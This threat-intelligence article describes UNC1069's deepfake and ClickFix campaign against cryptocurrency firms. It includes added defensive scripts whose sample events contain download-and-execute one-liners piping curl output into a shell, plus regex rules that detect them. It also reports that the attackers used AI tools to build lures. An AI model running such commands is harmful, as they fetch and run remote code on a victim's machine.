North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations
North Korean Hackers UNC1069 Combine Deepfakes, ClickFix and Seven Malware Families in a Cryptocurrency Theft Campaign
North Korea-linked threat actors are running a cryptocurrency theft campaign that combines deepfake video lures, Telegram-based social engineering and seven distinct malware families. The activity is attributed to UNC1069 (also tracked as CryptoCore and MASAN), a group with a long record of financially motivated intrusions.
The Perfect Storm: AI Meets Social Engineering
The attack begins with what looks like a legitimate business opportunity. Victims, typically cryptocurrency startup founders, software developers and venture capital professionals, receive Telegram messages from accounts impersonating reputable venture capitalists. In some cases the attackers used compromised accounts belonging to real entrepreneurs, so the approach arrives from a contact the victim may already know.
Once contact is established, victims are asked to schedule a meeting through Calendly, which sets up what they expect to be a standard 30-minute video call. The meeting link instead leads to a fake Zoom site at zoom.uswe05[.]us, where the victim lands in a counterfeit video call interface. The hostname is worth a second look: the real Zoom web client lives under zoom.us, whereas here “zoom” is merely a subdomain of an unrelated .us domain, the kind of lookalike that a glance at the address bar misses but a hostname allow-list on the proxy catches.
Deepfake Deception at Scale
The fake call page mirrors Zoom’s layout, down to the prompts to enable the camera and enter a display name. What victims do not realise is that the “participants” they see are either AI-generated deepfakes or recordings of earlier victims, whose webcam feeds were captured during previous fake calls. Replaying that footage produces a convincing live conversation for the length of a short call.
When the pre-recorded video ends, the interface switches to showing the victim’s own profile image, so the call still appears active. Kaspersky researchers, who documented similar tactics in October 2025, named that campaign “GhostCall”.
ClickFix: The Gateway to Compromise
The second phase uses ClickFix, a technique that tricks users into executing malicious commands under the guise of troubleshooting. During the fake call the victim is shown a bogus audio error and told to run a “troubleshooting command” to fix it. Because the victim copies and runs the command themselves, no exploit is involved, and on the endpoint the execution looks like ordinary user activity in a terminal.
On macOS the command runs an AppleScript that drops a malicious Mach-O binary tracked as WAVESHAPER. This C++ executable is the initial foothold: it gathers system information and deploys HYPERCALL, a Go-based downloader that then delivers the rest of the campaign’s tooling.
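The ClickFix step leaves a recognisable trace on the endpoint: a command-interpreter process with a suspicious one-liner whose ancestry runs back to an interactive terminal application. The following is an added detection example, not code from the report or from any vendor; the event format (pid, ppid, name, cmd) is a generic stand-in for what an EDR or Endpoint Security client records, the sample events are constructed, and the `do shell script` shape of the AppleScript stage is an assumption, since the report does not quote the script.

```python
"""Flag ClickFix-style command execution on macOS from process-start events.

Added example, not from the report. The event format is a generic stand-in
for EDR process telemetry and the sample events below are constructed.
"""
import re

# Apps a victim would paste a "troubleshooting command" into.
TERMINAL_APPS = {"Terminal", "iTerm2", "Warp", "Alacritty", "kitty"}

# Each rule matches one shape a ClickFix one-liner takes on macOS.
RULES = [
    # AppleScript used purely to run a shell command (assumed shape of the
    # AppleScript stage; the report does not quote the script).
    ("osascript_do_shell_script",
     re.compile(r"\bosascript\b.*\bdo shell script\b", re.I)),
    # Remote script piped straight into an interpreter.
    ("curl_pipe_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b", re.I)),
    # Inline base64 blob decoded into an interpreter.
    ("base64_decode_pipe_shell",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sh|bash|zsh)\b", re.I)),
]


def ancestry(by_pid, pid):
    """Return process names from pid up to the root we have events for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        event = by_pid[pid]
        chain.append(event["name"])
        pid = event["ppid"]
    return chain


def detect_clickfix(events):
    """Return one finding per process whose command line matches any rule.

    A match whose ancestry includes an interactive terminal app is the
    ClickFix shape (the user pasted the command) and is rated high; the same
    command under launchd or another daemon is rated medium for triage.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        rules = [name for name, rx in RULES if rx.search(event["cmd"])]
        if not rules:
            continue
        chain = ancestry(by_pid, event["pid"])
        interactive = any(name in TERMINAL_APPS for name in chain)
        findings.append({
            "pid": event["pid"],
            "rules": rules,
            "chain": " <- ".join(chain),
            "interactive": interactive,
            "severity": "high" if interactive else "medium",
        })
    return findings


# Constructed sample: a user pastes the lure command into Terminal (pids
# 100-103), a scheduled backup script runs osascript legitimately (200-201),
# and a launchd-started updater pipes curl into sh (300-301). The URL path
# on the lure domain is made up.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "name": "Terminal",
     "cmd": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 101, "ppid": 100, "name": "zsh", "cmd": "/bin/zsh -l"},
    {"pid": 102, "ppid": 101, "name": "osascript",
     "cmd": "osascript -e 'do shell script \"curl -fsSL https://zoom.uswe05[.]us/ | bash\"'"},
    {"pid": 103, "ppid": 101, "name": "bash",
     "cmd": "/bin/bash -c \"echo Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUudGVzdC8gfCBzaAo= | base64 -D | sh\""},
    {"pid": 200, "ppid": 1, "name": "launchd", "cmd": "/sbin/launchd"},
    {"pid": 201, "ppid": 200, "name": "osascript",
     "cmd": "osascript /Users/dev/Library/Scripts/backup.scpt"},
    {"pid": 300, "ppid": 1, "name": "launchd", "cmd": "/sbin/launchd"},
    {"pid": 301, "ppid": 300, "name": "sh",
     "cmd": "/bin/sh -c \"curl -s https://updates.example.test/agent.sh | sh\""},
]

if __name__ == "__main__":
    for finding in detect_clickfix(SAMPLE_EVENTS):
        print(finding)
```

The ancestry check is what separates ClickFix from the many legitimate `curl | sh` installers run by automation: the same one-liner is rated high only when a terminal app is in the parent chain, which is exactly where a victim following on-screen “fix” instructions ends up.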
Seven Malware Families: An Unprecedented Arsenal
The campaign deploys seven distinct malware families, several of them newly identified:
WAVESHAPER – The initial C++ dropper that establishes the beachhead and deploys HYPERCALL.
HYPERCALL – A Go-based downloader that serves as the primary distribution mechanism for subsequent payloads.
HIDDENCALL – A Go backdoor providing hands-on-keyboard access to compromised systems.
DEEPBREATH – A Swift-based data miner that manipulates macOS’s Transparency, Consent, and Control (TCC) database to bypass security restrictions.
SUGARLOADER – A C++ downloader that deploys CHROMEPUSH and other payloads.
CHROMEPUSH – A C++ data stealer deployed as a browser extension masquerading as an offline Google Docs editor.
SILENCELIFT – A minimalist C/C++ backdoor that communicates with command-and-control servers.
DEEPBREATH: TCC Manipulation for Data Theft
DEEPBREATH is the campaign’s most consequential component. By editing macOS’s TCC database it grants itself file system access that TCC would otherwise deny, then extracts iCloud Keychain credentials, browser data from Chrome, Brave and Edge, Telegram conversations and Apple Notes content.
Tampering with TCC shows familiarity with Apple’s privacy controls, but it is not a bypass from zero privilege. The per-user database (~/Library/Application Support/com.apple.TCC/TCC.db) is itself protected by TCC and the system database by SIP, so a process can only rewrite them once it already holds Full Disk Access. One common route is a user who has previously granted Full Disk Access to Terminal: commands pasted into that Terminal, ClickFix-style, run with the same access.
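A grant planted directly in TCC.db looks different from one the user approved through a prompt, which is what an incident responder can key on. The following is an added audit example, not code from the report or from DEEPBREATH. The `access` table is a reduced reconstruction of the real TCC.db schema (the real table has more columns), the allow-list and every row are constructed, and the meanings given for `auth_value` and `client_type` are stated from general knowledge of TCC rather than from the report. Reading the real database files itself requires Full Disk Access, which is the permission being audited.

```python
"""Audit a macOS TCC database for grants a data stealer would plant.

Added example, not code from the report or from DEEPBREATH. The `access`
table is a reduced reconstruction of the real TCC.db schema; the
allow-list and all rows are constructed.
"""
import sqlite3

# Services whose grants give a stealer what DEEPBREATH is after.
HIGH_VALUE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceAccessibility": "Accessibility",
    "kTCCServiceListenEvent": "Input Monitoring",
    "kTCCServiceScreenCapture": "Screen Recording",
    "kTCCServiceCamera": "Camera",
    "kTCCServiceMicrophone": "Microphone",
}
AUTH_ALLOWED = 2       # auth_value: 0 denied, 1 unknown, 2 allowed, 3 limited
CLIENT_TYPE_PATH = 1   # client_type: 0 bundle identifier, 1 absolute path

# Hypothetical per-host allow-list of clients expected to hold these grants.
EXPECTED_CLIENTS = {"com.apple.Terminal", "us.zoom.xos", "com.microsoft.VSCode"}


def audit_tcc(conn, expected_clients, since_epoch=None):
    """Return suspicious allowed grants for high-value services.

    A grant is reported when the client is not on the allow-list, is
    identified by path rather than bundle ID (typical for an ad hoc or
    unsigned dropped binary), carries no code-signing requirement (csreq),
    or was modified inside the incident window given by since_epoch.
    """
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value, csreq, last_modified "
        "FROM access ORDER BY rowid"
    ).fetchall()
    findings = []
    for service, client, client_type, auth_value, csreq, last_modified in rows:
        if service not in HIGH_VALUE_SERVICES or auth_value != AUTH_ALLOWED:
            continue
        reasons = []
        if client not in expected_clients:
            reasons.append("client not on allow-list")
        if client_type == CLIENT_TYPE_PATH:
            reasons.append("path-based client rather than bundle ID")
        if csreq is None:
            reasons.append("no code-signing requirement recorded")
        if since_epoch is not None and last_modified >= since_epoch:
            reasons.append("modified inside incident window")
        if reasons:
            findings.append({
                "service": HIGH_VALUE_SERVICES[service],
                "client": client,
                "last_modified": last_modified,
                "reasons": reasons,
            })
    return findings


def build_sample_db():
    """Constructed in-memory stand-in for TCC.db (reduced schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, auth_reason INTEGER, csreq BLOB, last_modified INTEGER)"
    )
    signed = b"\xfa\xde\x0c\x00"  # placeholder; real csreq blobs start with this magic
    conn.executemany(
        "INSERT INTO access VALUES (?, ?, ?, ?, ?, ?, ?)",
        [
            # User granted Terminal Full Disk Access long ago: expected.
            ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, signed, 1700000000),
            # Zoom client with camera access: expected.
            ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, signed, 1700000100),
            # Microphone denied to a helper: not an allowed grant, ignored.
            ("kTCCServiceMicrophone", "com.example.helper", 0, 0, 2, signed, 1700000200),
            # Dropped binary given Full Disk Access by a direct row insert.
            ("kTCCServiceSystemPolicyAllFiles", "/Users/dev/Library/Caches/.audio-fix", 1, 2, 2, None, 1760000000),
            # Unknown bundle given Input Monitoring in the same window.
            ("kTCCServiceListenEvent", "com.example.callhelper", 0, 2, 2, None, 1760000060),
        ],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    for finding in audit_tcc(build_sample_db(), EXPECTED_CLIENTS, since_epoch=1759000000):
        print(finding)
```

Against a real host, point `sqlite3.connect` at a copy of the user database and, if SIP is off, the system one under /Library/Application Support/com.apple.TCC/, and set `since_epoch` to the start of the suspected intrusion; a row with no csreq is the strongest single signal, because a grant approved through the normal prompt records the requesting code’s signing requirement.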
CHROMEPUSH: Credential and Cookie Theft from the Browser
CHROMEPUSH is delivered as a browser extension posing as an offline document editor. Once installed it records keystrokes, watches username and password fields, and extracts browser cookies, giving the attackers both credentials and live session tokens for the victim’s online accounts.
Chrome, Brave and Edge are all Chromium-based, so one extension package runs unchanged in all three, which is why a single component covers the browsers most of its targets use.
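An extension with those capabilities has to declare them in its manifest.json, so the manifests of installed extensions are a cheap place to look. The following triage script is an added example, not CHROMEPUSH or anything from the report. Both manifests are constructed; the assumption that a Chrome Web Store install carries the store `update_url` is stated from general knowledge, and the impersonated-name list is a hypothetical starting point.

```python
"""Triage a Chromium extension manifest for stealer capabilities.

Added example, not CHROMEPUSH or anything from the report. The two
manifests are constructed, and the Web Store update_url check is an
assumption about how store-installed extensions look on disk.
"""
import json

BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
WEB_STORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
# Hypothetical list of names a sideloaded extension might borrow.
IMPERSONATED_NAMES = {"google docs offline", "google docs", "google drive"}


def _broad(patterns):
    return any(p in BROAD_HOST_PATTERNS for p in patterns)


def triage_manifest(manifest):
    """Return a score and the signals behind it; higher means investigate first."""
    perms = set(manifest.get("permissions", []))
    # MV2 manifests put host patterns in "permissions"; MV3 uses "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {
        p for p in perms if "://" in p or p == "<all_urls>"
    }
    signals = []
    score = 0

    if _broad(hosts):
        signals.append("runs on every site (broad host permissions)")
        score += 2
    if "cookies" in perms and _broad(hosts):
        signals.append("can read cookies for every site: session theft")
        score += 3
    for cs in manifest.get("content_scripts", []):
        if _broad(cs.get("matches", [])) and cs.get("run_at") == "document_start":
            signals.append("content script on every page before load: can hook inputs")
            score += 3
            break
    if {"webRequest", "webRequestBlocking"} & perms and _broad(hosts):
        signals.append("can intercept or rewrite all web traffic")
        score += 2
    sideloaded = manifest.get("update_url") != WEB_STORE_UPDATE_URL
    if sideloaded:
        signals.append("not installed from the Chrome Web Store (no store update_url)")
        score += 1
        if manifest.get("name", "").strip().lower() in IMPERSONATED_NAMES:
            signals.append("name matches a well-known Google extension but is sideloaded")
            score += 3
    return {"name": manifest.get("name"), "score": score, "signals": signals}


# Constructed lookalike of the masquerade described above.
LOOKALIKE_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "Google Docs Offline",
  "version": "1.0",
  "permissions": ["cookies", "storage", "webRequest"],
  "host_permissions": ["<all_urls>"],
  "background": {"service_worker": "bg.js"},
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["cs.js"], "run_at": "document_start"}]
}""")

# Constructed benign offline editor: one origin, store-installed.
BENIGN_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "Offline Editor",
  "version": "2.3",
  "update_url": "https://clients2.google.com/service/update2/crx",
  "permissions": ["storage", "unlimitedStorage"],
  "host_permissions": ["https://docs.example.test/*"],
  "content_scripts": [{"matches": ["https://docs.example.test/*"], "js": ["editor.js"]}]
}""")

if __name__ == "__main__":
    for manifest in (LOOKALIKE_MANIFEST, BENIGN_MANIFEST):
        print(json.dumps(triage_manifest(manifest), indent=2))
```

On macOS the installed manifests live under ~/Library/Application Support/Google/Chrome/Default/Extensions/<id>/<version>/manifest.json, with the equivalent BraveSoftware/Brave-Browser and Microsoft Edge profile directories for the other two browsers. The sideloading signal is a triage aid rather than proof: extensions loaded unpacked in developer mode or pushed by enterprise policy also lack the store `update_url`, so the score is meant to order investigation, not to convict.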
The Bigger Picture: AI-Enhanced Cybercrime
This campaign shows how generative AI is changing the economics of social engineering. UNC1069 has used tools including Google’s Gemini since at least 2023 to produce lure material, craft convincing messages and generate deepfake content, and has also tried to use them to develop cryptocurrency theft code.
The AI use goes beyond the deepfakes. The text of the approach itself, from the initial contact through the follow-ups that end in a scheduled meeting, can be produced in volume with fluent, context-appropriate language, which removes the clumsy phrasing that once gave such lures away and lets a small team run many conversations at once.
Financial Motivation and Strategic Targeting
UNC1069’s shift from traditional finance to the cryptocurrency sector reflects the value concentrated in Web3 and the weaker controls around it. By targeting centralized exchanges, financial software developers, high-tech companies and venture capital firms, the group positions itself to reach not just individual holdings but exchange infrastructure and investment portfolios.
The deployment of several new malware families alongside an established tool like SUGARLOADER marks a significant expansion in the group’s capability, which may reflect either increased funding from the North Korean state or proceeds reinvested from earlier campaigns.
Technical Sophistication Meets Operational Scale
The volume of tooling deployed on a single host, up to seven malware families, shows UNC1069’s intent to harvest every credential, browser artefact and session token available. Each family covers a different source of access, so a victim who escapes one stealer is still exposed to the others.
The campaign’s infrastructure includes compromised Telegram accounts, fake Zoom websites, Calendly scheduling and multiple command-and-control servers, an ecosystem that is hard to dismantle in one action and cheap for the attackers to rebuild.
Industry Response and Mitigation
Security researchers describe the campaign as a shift in cryptocurrency-related cybercrime: AI-generated content, deepfake video and several malware delivery stages are combined in a way that email filtering and signature-based controls do not address, because the initial contact never passes through email and the first execution happens by the user’s own hand.
Organizations in the cryptocurrency sector should verify unsolicited meeting requests out of band (a known phone number or a channel the counterpart has used before, not the Telegram account that made the approach), check that video-call links resolve to the provider’s real domain, teach staff that no legitimate video conferencing client asks users to paste commands into a terminal, and deploy endpoint detection that covers the macOS tooling used here.
The Future of AI-Powered Cybercrime
UNC1069’s campaign is a warning for the wider industry: as AI tools become cheaper and more capable, attacks that pair convincing social engineering with custom tooling will become more common.
Other threat actors are likely studying and copying these techniques, so the same playbook can be expected against sectors well beyond cryptocurrency.